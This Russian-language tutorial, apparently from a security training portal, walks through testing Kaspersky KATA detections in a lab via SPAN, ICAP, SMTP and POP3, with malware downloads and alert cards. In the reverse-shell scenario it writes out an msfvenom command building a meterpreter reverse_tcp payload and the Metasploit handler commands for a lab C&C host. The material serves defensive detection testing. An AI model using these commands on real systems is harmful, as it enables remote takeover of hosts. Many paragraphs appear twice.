1 августа 2024
KATA
Защита периметра. Тестирование
Цикл "Kaspersky Symphony XDR"
Вводная статья
Блок KUMA
Блок KATA
Блок KEDR
Блок KUMA
- KUMA. Введение: обзор архитектуры
- Установка системы. Подключение активов
- Парсинг логов. Подключение логов CheckPoint, KSC, KSMG, Microsoft AD
- Написание своего парсера и нормализации
- Обогащение логов в коллекторе
- Работа с простыми алертами и инцидентами. Создание простых корреляционных правил
- Работа с тяжелыми алертами. Создание тяжелых корреляционных правил
- Оповещения в телеграмм
- Построение дашбордов
- Symphony XDR, автоматическое реагирование через агенты
Блок KATA
- Защита периметра. Теория
- Защита периметра. Развертывание системы
- Защита периметра. Развертывание центрального узла
- Защита периметра. Настройка платформы
- Защита периметра. Подключение источника
- Защита периметра. Тестирование
Блок KEDR
Введение
Рады приветствовать вас уже в 6 статье блока KATA из цикла по Symphony XDR на портале TS University!
В прошлый раз мы подключили источники через SPAN, ICAP, SMTP и POP3. Теперь, когда источники подключены, можно перейти к тестированию.
В прошлый раз мы подключили источники через SPAN, ICAP, SMTP и POP3. Теперь, когда источники подключены, можно перейти к тестированию.
Тестирование
SPAN
Как мы говорили в предыдущей статье, у нас зеркалируется сетевой трафик с хоста с ОС Windows Server. Мы протестируем 3 сценария:
Взглянем на схему нашего тестового стенда.
В скобках цифрами указаны рассматриваемые сценарии:
Как мы говорили в предыдущей статье, у нас зеркалируется сетевой трафик с хоста с ОС Windows Server. Мы протестируем 3 сценария:
- С клиентского компьютера через протокол SMB скачаем вредоносное ПО, размещенное в сетевой папке на хосте.
- С клиентского компьютера просканируем порты хоста, используя утилиту nmap.
- Имитируем проникновение программы удаленного управления на хост организации.
Взглянем на схему нашего тестового стенда.
В скобках цифрами указаны рассматриваемые сценарии:
Первый сценарий достаточно типичен для корпоративной сети: клиенты подключаются к файловому серверу и работают с различными файлами.
Для проверки мы загрузим несколько вредоносных файлов в папку на хосте, опубликуем папку и получим доступ с другого клиентского компьютера. Затем попробуем скачать оттуда несколько файлов на клиентский компьютер.
Для проверки мы загрузим несколько вредоносных файлов в папку на хосте, опубликуем папку и получим доступ с другого клиентского компьютера. Затем попробуем скачать оттуда несколько файлов на клиентский компьютер.
Хост расположен по адресу 10.10.30.48, а папка называется «public folder». Мы получили доступ через Проводник с клиентского компьютера.
Теперь попробуем выгрузить файлы оттуда:
Теперь попробуем выгрузить файлы оттуда:
Пройдя по пути простого копирования, они теперь располагаются на клиентском ПК в папке ВПО на диске D.
Давайте заглянем в обнаружения в KATA:
Давайте заглянем в обнаружения в KATA:
Соответственно, мы видим время создания, важность обнаружения, тип вредоносного объекта, название проверяемого объекта, адрес источника и назначения, технологии обнаружения.
Как видно из технологий обнаружения, некоторые вредоносные файлы были распознаны только песочницей. То есть статический анализ на хостах или в почте не обнаружил бы данные объекты, и они бы продолжали там находиться.
Давайте исследуем карточку по одному из обнаружений.
Как видно из технологий обнаружения, некоторые вредоносные файлы были распознаны только песочницей. То есть статический анализ на хостах или в почте не обнаружил бы данные объекты, и они бы продолжали там находиться.
Давайте исследуем карточку по одному из обнаружений.
Первое, что мы видим — это две кнопки сверху справа: назначить обнаружение и закрыть обнаружение.
В основном окне — информация о состоянии обнаружения, важности, источнике данных, времени создания и времени обновления и прочая связанная информация.
В основном окне — информация о состоянии обнаружения, важности, источнике данных, времени создания и времени обновления и прочая связанная информация.
- Когда обнаружение только появляется, то имеет состояние «Новое». При назначении обнаружения сотруднику состояние становится «В обработке». После обработки обнаружение должно быть закрыто и приобретет соответствующее состояние.
- В поле «Источник данных» можно увидеть, какой SPAN Sensor принял трафик.
- Информация об объекте: возможность получить имя, хэш в MD5 или SHA256, перейти на портал Kaspersky Threat Intelligence или скачать файл прямо из веб интерфейса.
- Сетевое событие: при взаимодействии каких сетевых узлов или хостов был замечен объект.
Далее идут результаты проверки. В данном случае объектом был архив, и каждый потенциально опасный файл в архиве был исследован.
Любой объект, проверенный в песочнице, можно исследовать детальнее, перейдя по кнопке «Sandbox-обнаружение»:
Любой объект, проверенный в песочнице, можно исследовать детальнее, перейдя по кнопке «Sandbox-обнаружение»:
Тут можно посмотреть, в каких операционных системах и как себя ведет объект:
- Список активностей. Что происходило после запуска объекта;
- Дерево активностей. Визуализированный в виде графа список активностей, показывающий действия, которые привели к результату анализа;
- Журнал HTTP-активности. Сетевые обращения;
- Журнал действий IDS. Сработки IDS в виртуальной среде.
Стоит отметить, что существует 2 режима проверки в песочнице: ведение полного журнала и быстрая.
Перейдем к проверке IDS во втором сценарии. Попробуем просканировать порты нашего хоста. Я использую утилиту nmap со своей клиентской рабочей станции. В Windows она имеет графический интерфейс.
Просто вводим IP адрес и нажимаем Scan:
- В режиме ведения полного журнала объект в виртуальной среде выполняется в реальном времени, что позволяет получить более детальные сведения.
- В режиме быстрого сканирования собирается меньше деталей, но наблюдение производится в 10 раз дольше. На реальное время проверки это не сказывается, так как применяются специальные технологии.
Перейдем к проверке IDS во втором сценарии. Попробуем просканировать порты нашего хоста. Я использую утилиту nmap со своей клиентской рабочей станции. В Windows она имеет графический интерфейс.
Просто вводим IP адрес и нажимаем Scan:
В интерфейсе KATA в разделе «Обнаружения» мы сразу же получаем набор алертов:
Но давайте попробуем сымитировать что-то поинтереснее.
Представим, что злоумышленник послал вредоносный исполняемый файл, и он проник на хост сети. Вредоносный файл сам по себе ничего вредоносного не делает. Его задача — связаться с сервером управления и предоставить удаленный доступ к хосту злоумышленникам. Такой вид подключения называется Reverse Shell.
Для организации такого мы использовали фреймворк Metasploit. Этот фреймворк установлен на том же сервере, что и наш веб-прокси Squid с ip 10.10.30.59 для простоты лабораторного стенда.
Сначала нам необходимо создать вредоносную программу, которая будет запускаться на хосте. В этом нам поможет утилита msfvenom. Запустим её со следующими параметрами:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -o /home/tssol/payload.exe lhost=10.10.30.59 lport=3300
Ключ -p задает тип полезной нагрузки. В данном случае мы используем reverse_tcp для windows. Ключ -f задает расширение файла, ключ -o задает путь и имя выходного файла. lhost и lport — параметры подключения к серверу C&C.
После создания файла мы можем переместить его на наш «атакуемый» хост.
Разместим его в уже использованную нами ранее папку «public folder»:
Представим, что злоумышленник послал вредоносный исполняемый файл, и он проник на хост сети. Вредоносный файл сам по себе ничего вредоносного не делает. Его задача — связаться с сервером управления и предоставить удаленный доступ к хосту злоумышленникам. Такой вид подключения называется Reverse Shell.
Для организации такого мы использовали фреймворк Metasploit. Этот фреймворк установлен на том же сервере, что и наш веб-прокси Squid с ip 10.10.30.59 для простоты лабораторного стенда.
Сначала нам необходимо создать вредоносную программу, которая будет запускаться на хосте. В этом нам поможет утилита msfvenom. Запустим её со следующими параметрами:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -o /home/tssol/payload.exe lhost=10.10.30.59 lport=3300
Ключ -p задает тип полезной нагрузки. В данном случае мы используем reverse_tcp для windows. Ключ -f задает расширение файла, ключ -o задает путь и имя выходного файла. lhost и lport — параметры подключения к серверу C&C.
После создания файла мы можем переместить его на наш «атакуемый» хост.
Разместим его в уже использованную нами ранее папку «public folder»:
Теперь запустим наш сервер C&C.
На сервере с установленным пакетом Metasploit перейдем в msfconsole и запустим следующие команды:
В консоли мы увидим следующее:
На сервере с установленным пакетом Metasploit перейдем в msfconsole и запустим следующие команды:
- use /exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 10.10.30.59
- set lport 3300
- exploit
В консоли мы увидим следующее:
Теперь запустим файл payload. exe на хосте. При этом внешне ничего не произойдет.
Но можно проверить, запустилась ли программа, открыв диспетчер задач и найдя в процессах следующее:
Но можно проверить, запустилась ли программа, открыв диспетчер задач и найдя в процессах следующее:
На сервере мы увидим новое подключение от 10.10.30.48 и приглашение в командную строку.
Введем команду dir для получения списка файлов в папке:
Введем команду dir для получения списка файлов в папке:
Таким образом мы с вами получили удаленное управление.
Теперь проверим, появилось ли обнаружение в KATA.
Теперь проверим, появилось ли обнаружение в KATA.
Да, появилось новое обнаружение.
Интересный момент, который следует отметить. В рамках тестов было сделано 2 подключения через playload. exe к командному серверу в разное время. Но обнаружение мы видим одно. Для одного правила обнаружения атаки создается одна карточка обнаружения за 24 часа после первого события такого типа. Если же обнаружение было обработано и закрыто, но появилось новое похожее событие в течение 24 часов, то обнаружение вернется в статус «В обработке».
Перейдем к самой карточке обнаружения для просмотра детальных данных по обнаружению.
Интересный момент, который следует отметить. В рамках тестов было сделано 2 подключения через playload. exe к командному серверу в разное время. Но обнаружение мы видим одно. Для одного правила обнаружения атаки создается одна карточка обнаружения за 24 часа после первого события такого типа. Если же обнаружение было обработано и закрыто, но появилось новое похожее событие в течение 24 часов, то обнаружение вернется в статус «В обработке».
Перейдем к самой карточке обнаружения для просмотра детальных данных по обнаружению.
Здесь мы можем увидеть состояние, важность, источник данных, время создания и время обновления (время последнего события в рамках обнаружения). А также можем видеть данные по сработавшему IDS-правилу.
Ниже располагается список событий, попавших под правило. Здесь как раз видно, что подключение осуществлялось дважды (сначала в 14:56 и потом в 16:01).
Дополнительно вы можете вести журнал изменений по обнаружению и скопировать данные обнаружения при необходимости изучения их с поддержкой или аналитиками вендора.
Ниже располагается список событий, попавших под правило. Здесь как раз видно, что подключение осуществлялось дважды (сначала в 14:56 и потом в 16:01).
Дополнительно вы можете вести журнал изменений по обнаружению и скопировать данные обнаружения при необходимости изучения их с поддержкой или аналитиками вендора.
Справа мы можем увидеть список рекомендаций: найти обнаружения, связанные с ip адресом, добавить правило в исключения, найти похожие события по IP адресу (работает в связке с KEDR). А также скачать json с первым артефактом IDS и скачать pcap-файл для исследования, например, в Wireshark.
ICAP
Посмотрим на схему тестового стенда:
Посмотрим на схему тестового стенда:
Для тестирования ICAP мы указали на клиентском ПК в настройке-прокси сервера адрес сервера со службой Squid.
Рассмотрим 3 режима:
Воспользуемся порталом Tekdefense и начнем с режима мониторинга.
Мы загрузили 3 файла. Все они определяются стандартными антивирусными механизмами и все они скачались на клиентский ПК.
- Режим мониторинга. Проверка того, что вредоносные файлы успешно скачиваются и обнаруживаются в KATA;
- Режим стандартной проверки. Проверим, как происходит блокировка вредоносного файла в реальном времени при работе потокового антивируса;
- Режим расширенной проверки. Посмотрим страницы-заглушки и убедимся, что файл ожидает вердикта песочницы.
Воспользуемся порталом Tekdefense и начнем с режима мониторинга.
Мы загрузили 3 файла. Все они определяются стандартными антивирусными механизмами и все они скачались на клиентский ПК.
Перейдем в интерфейс специалиста ИБ в KATA.
Все 3 файла были сразу определены. Как выглядит карточка обнаружения, мы снова рассматривать не будем. Обнаружение будет идентично тому, которое генерировалось при SPAN, но в данном случае в качестве источника будет указан ICAP.
Перейдем ко второму сценарию. Переключим режим проверки в реальном времени на стандартную.
Перейдем ко второму сценарию. Переключим режим проверки в реальном времени на стандартную.
И снова качаем вредоносные файлы.
На первом же файле после нам открывается страница с надписью «файл заблокирован»:
На первом же файле после нам открывается страница с надписью «файл заблокирован»:
Файл сразу появился в интерфейсе обнаружения:
Перейдем к режиму 3.
Попробуем снова скачать файл с tekdefense.
При нажатии на ссылку для скачивания нас перекинет на страницу проверки:
При нажатии на ссылку для скачивания нас перекинет на страницу проверки:
На данном этапе файл проверяется в песочнице, и до тех пор, пока он не будет проверен, ссылка «Download link…» не даст вам его скачать. Шаблоны всех страниц-заглушек можно изменять в параметрах KATA.
Вновь нажимаем на «Download link…» через пару минут и нас перекидывает на страницу блокировки:
Вновь нажимаем на «Download link…» через пару минут и нас перекидывает на страницу блокировки:
Если файл не будет признан вредоносным, то у пользователя начнется процесс скачивания.
Именно так работает интеграция по ICAP с KATA.
Один из интересных сценариев интеграции: KATA и отечественные NGFW-решения. Отечественные NGFW-решения в большинстве своем не обладают собственными песочницами в рамках одного вендора и могут выступать в качестве ICAP-клиента для интеграции.
Именно так работает интеграция по ICAP с KATA.
Один из интересных сценариев интеграции: KATA и отечественные NGFW-решения. Отечественные NGFW-решения в большинстве своем не обладают собственными песочницами в рамках одного вендора и могут выступать в качестве ICAP-клиента для интеграции.
Почтовый трафик
Начнем с интеграции по SMTP.
Взглянем на схему:
Взглянем на схему:
Для имитации отправителя будем использовать программу SwithMail.
Адрес отправителя будет ivan.i@company.ru, а получателя kata_smtp@tss.lab.
Транспортное правило будет добавлять к любому письму в сторону kata_smtp@tss.lab в скрытую копию адрес sbx@kata.tss.lab.
Адрес отправителя будет ivan.i@company.ru, а получателя kata_smtp@tss.lab.
Транспортное правило будет добавлять к любому письму в сторону kata_smtp@tss.lab в скрытую копию адрес sbx@kata.tss.lab.
В качестве вредоносного вложения мы добавляем файл Bombermania.exe.zip, скачанный с портала Tekdefense в тесте SPAN.
Отправим письмо и проверим его в ящике пользователя:
Отправим письмо и проверим его в ящике пользователя:
Письмо было успешно доставлено.
Также и в обнаружениях KATA у нас появилось событие:
Также и в обнаружениях KATA у нас появилось событие:
В отличие от SPAN и ICAP, в обнаружении SMTP будут указаны для адресов источника и назначения не ip-адреса, а email.
В сведениях будет указана тема письма. В карточке обнаружения мы также найдем много интересной информации.
В сведениях будет указана тема письма. В карточке обнаружения мы также найдем много интересной информации.
В источнике данных мы видим, какой именно почтовый сервер переслал это письмо.
В информации об объекте находятся адреса отправителя/получателя, исходный адрес получателя, IP адрес сервера-отправителя, тема, заголовки.
Также вы можете скачать письмо в формате EML для детального изучения.
В информации об объекте находятся адреса отправителя/получателя, исходный адрес получателя, IP адрес сервера-отправителя, тема, заголовки.
Также вы можете скачать письмо в формате EML для детального изучения.
Далее всё, как и в карточках обнаружений для других источников.
Рассмотрим теперь интеграцию через протокол POP3.
Схема будет похожа на предыдущую, за исключением того, что инициатором соединения будет сама платформа KATA:
Рассмотрим теперь интеграцию через протокол POP3.
Схема будет похожа на предыдущую, за исключением того, что инициатором соединения будет сама платформа KATA:
Для того чтобы KATA могла выгружать письма, мы создали архивный ящик kata_service_mailbox@tss.lab.
Адрес отправителя будет ivan.i@company.ru, а получателя - user_mailbox@tss.lab. Письма, направленные адресу user_mailbox@tss.lab будут автоматически копироваться ещё в kata_service_mailbox@tss.lab. KATA будет подключаться к серверу Exchange каждые 2 секунды и выгружать из ящика kata_service_mailbox@tss.lab все новые письма.
В качестве вредоносного вложения был добавлен файл 340s.exe.zip. Тестирование будем производить аналогично SMTP интеграции, используя программу SwithMail.
Адрес отправителя будет ivan.i@company.ru, а получателя - user_mailbox@tss.lab. Письма, направленные адресу user_mailbox@tss.lab будут автоматически копироваться ещё в kata_service_mailbox@tss.lab. KATA будет подключаться к серверу Exchange каждые 2 секунды и выгружать из ящика kata_service_mailbox@tss.lab все новые письма.
В качестве вредоносного вложения был добавлен файл 340s.exe.zip. Тестирование будем производить аналогично SMTP интеграции, используя программу SwithMail.
Отправим письмо.
Видим, что оно успешно было доставлено в ящик пользователя.
Проверим ящик kata_service_mailbox:
Проверим ящик kata_service_mailbox:
Здесь его нет. Проверим в обнаружениях в KATA.
Видим, что появилось обнаружение.
Это наше письмо, так как в теме было указано «POP3». KATA успешно его выгрузила и он был удален из ящика.
В Exchange OWA можно также посмотреть, было ли письмо в ящике, если перейти в «Восстановление удаленных элементов»:
Это наше письмо, так как в теме было указано «POP3». KATA успешно его выгрузила и он был удален из ящика.
В Exchange OWA можно также посмотреть, было ли письмо в ящике, если перейти в «Восстановление удаленных элементов»:
Заключение
Подведём итог: в этой статье мы с вами рассмотрели то, как формируются обнаружения в зависимости от источника на различных примерах. А также дополнительно изучили, как выглядят карточки обнаружений и какую информацию можно оттуда извлечь в рамках расследования потенциального инцидента.
Эта статья завершает тему по функционалу KATA, но мы обязательно вернемся к обзору возможностей платформы в рамках KEDR.
Оставайтесь с нами!
Эта статья завершает тему по функционалу KATA, но мы обязательно вернемся к обзору возможностей платформы в рамках KEDR.
Оставайтесь с нами!